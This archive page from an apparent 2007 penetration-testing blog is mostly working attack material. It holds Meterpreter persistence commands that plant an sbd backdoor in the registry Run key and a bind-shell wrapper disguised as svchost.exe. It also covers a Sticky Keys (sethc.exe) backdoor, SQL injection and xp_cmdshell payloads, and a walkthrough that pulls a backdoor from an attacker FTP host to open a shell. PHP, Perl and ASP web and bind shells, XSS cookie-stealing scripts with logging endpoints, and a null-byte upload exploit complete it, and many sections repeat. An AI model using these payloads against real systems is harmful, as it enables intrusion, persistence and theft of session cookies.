1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs
eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.
20070330
20070328
Setting and Confirming reg keys w/meterpreter.
super quick meterpreter sequence
Prep
Set
Verify
Use
Prep
upload c:\\sbdbg.exe c:\\windows\\system32\\
Set
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"
Verify
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor
Use
(reboot)
20070323
Comparing Common Vulnerability Result Sets
One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:
An example corresponding file could be something like this
Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]
Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.
nessus_extract.pl (version 1.7) [download perl]
I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.
One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.
An example corresponding file could be something like this
Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]
Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.
nessus_extract.pl (version 1.7) [download perl]
I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.
One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.
20070315
Pentest Order of Objects..
ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.
Not to be too open.. but this has lead to a really good idea for object orient coding.
Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT
INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning
Although it is not my company's standard it is quite close.
Not to be too open.. but this has lead to a really good idea for object orient coding.
Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT
INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning
20070313
SBD as netcat
Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).
Netcat and its NC Clones:
None of this is news.. I just wanted to point out some of this simple stuff.
Netcat and its NC Clones:
- netcat - "swiss army knife"
- sbd & sbdbg.exe - shadowinteger's backdoor
- netcat6 - swiss army knife+ for ipv6
- cryptcat - netcat with twofish encryption
- socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80
None of this is news.. I just wanted to point out some of this simple stuff.
20070308
sbd fun as a rookit via sethc.exe
SBD Fun
Transfering files
Transfering files through .tar.gz
PORT Scan:
Using Cmd.exe to bind to service
In my experience this is flaky at best..
create then start service:
Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).
SCM starts a service
RegisterServiceCtrlHandler API
We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.
Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
Rootkit portion
Rename output binary to sethc.exe .. works ok.
Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.
Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.
Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.
Can there fake handler for WM_CLOSE? or terminate...
Transfering files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10
Transfering files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337
PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000
Using Cmd.exe to bind to service
In my experience this is flaky at best..
create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc
sc start testsvc
Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).
SCM starts a service
RegisterServiceCtrlHandler API
We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.
Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}
Rootkit portion
Rename output binary to sethc.exe .. works ok.
Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.
Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.
Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.
Can there fake handler for WM_CLOSE? or terminate...
20070307
PNG Listener w/logger
This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)
I developed this snippet while working on a solution for browser history leaks.
(Do I really have to explain how to use this?)
<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>
I developed this snippet while working on a solution for browser history leaks.
SQL injection and identification
Identify sql Server through Blind SQL injection
http://example.com/index.php?some_var=1/*!40017%20s*/
MySQL is at least 4.0.17 if you get a different result.
## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access
Normal Union attack
MS-SQL
Check if we are admins
Check things like
MSSQL_OPENQUERY
MSSQL_OPENROWSET
or
If we have a linked server and sa
If already sa
Other things todo
http://example.com/index.php?some_var=1/*!40017%20s*/
MySQL is at least 4.0.17 if you get a different result.
## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access
Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--
MS-SQL
Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))
Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))
MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))
or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))
If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')
Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
20070306
reverse-shell from SQL server
So you go the super secret sa password (or they left it blank~?)
{SQL template}
Pull data back to SQL:
c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe
Or be obvious:
On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe
{SQL template} set up FTP command script:
{SQL template} Execute FTP script:
{SQL template} setup reverse shell:
{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..
{SQL template} schedule execution of bat file
connect from any.evil.ip
osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"
{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"
Pull data back to SQL:
c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe
Or be obvious:
net user add
On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe
{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp
ECHO QUIT >> script.ftp
{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip
{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat
{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..
time
{SQL template} schedule execution of bat file
at \\sql.vuln.box\ 04:20 evil.bat
connect from any.evil.ip
sbd sql.vuln.box 4337
Just some simple shell notes:
Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images
PNG Headers
Comment writers for jpegs
edjpgcom
Basic php shell
Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.
unix:
write lol from echo with hex (no newline) to file
SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"
although plink -raw and telnet are not as good they can work.
Play with Cookies
Simple cookie push
Cookie View
Manipulate Cookie
stealer.php
Other stealers
Perl shell
ASP Quicky whoami ?
ASP Shell
- WshShell.Exec error '80070005' likely
Curl into older PHP servers from chroot skeletons.
Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg
CGI null byte stuff too..
see... php null byte
ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images
PNG Headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width
Comment writers for jpegs
edjpgcom
Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>
ob_clean();
system("[command]");
die();
?>
Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext
unix:
write lol from echo with hex (no newline) to file
echo -en "\x6c\x6f\x6c" > file.ext
SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"
although plink -raw and telnet are not as good they can work.
Play with Cookies
Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>
Cookie View
Javascript:alert(document.cookie);
Manipulate Cookie
Javascript:void(document.cookie=“variable=value”);
stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Other stealers
<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");
echo "<script>window.location.replace('".$Redirect."')</script>";
?>
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");
echo "<script>window.location.replace('".$Redirect."')</script>";
?>
Perl shell
#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
ASP Quicky whoami ?
<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>
ASP Shell
- WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>
Curl into older PHP servers from chroot skeletons.
<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);
$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;
print $data;
?>
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);
$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;
print $data;
?>
Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg
CGI null byte stuff too..
see... php null byte
ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA
Subscribe to:
Posts (Atom)
Posts
